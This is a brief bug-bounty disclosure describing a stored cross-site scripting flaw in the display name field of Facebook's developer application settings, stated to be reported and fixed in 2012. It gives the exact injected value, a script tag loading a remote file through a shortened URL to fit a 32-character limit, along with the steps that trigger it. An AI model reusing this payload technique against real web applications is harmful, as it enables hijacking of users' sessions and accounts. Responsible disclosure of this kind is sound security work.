The vulnerability was in the display name field of the application. The following steps were taken to produce the XSS on my Firefox 15.0 browser:
- I created a malicious script, a file containing "alert(/XSSed/)", and hosted it on my server. The URL of the file became http://yujikosuga.com/xss.js
- I shortened the URL to http://goo.gl/p3skt because the maximum character length of the display name field is limited to 32 characters.
- I created a new Facebook application on the Developers website and set its display name to "<script src=//goo.gl/p3skt/><!--".
- I clicked on the Open Graph tab in the left menu, entered "xss" into the input fields and proceeded to the next page.
- I opened the Action Types section.
- An alert popup showing "/XSSed/" was displayed on my browser--the script was activated.
This vulnerability was reported on August 30 and fixed on September 5 as part of Facebook's Security Bug Bounty Program.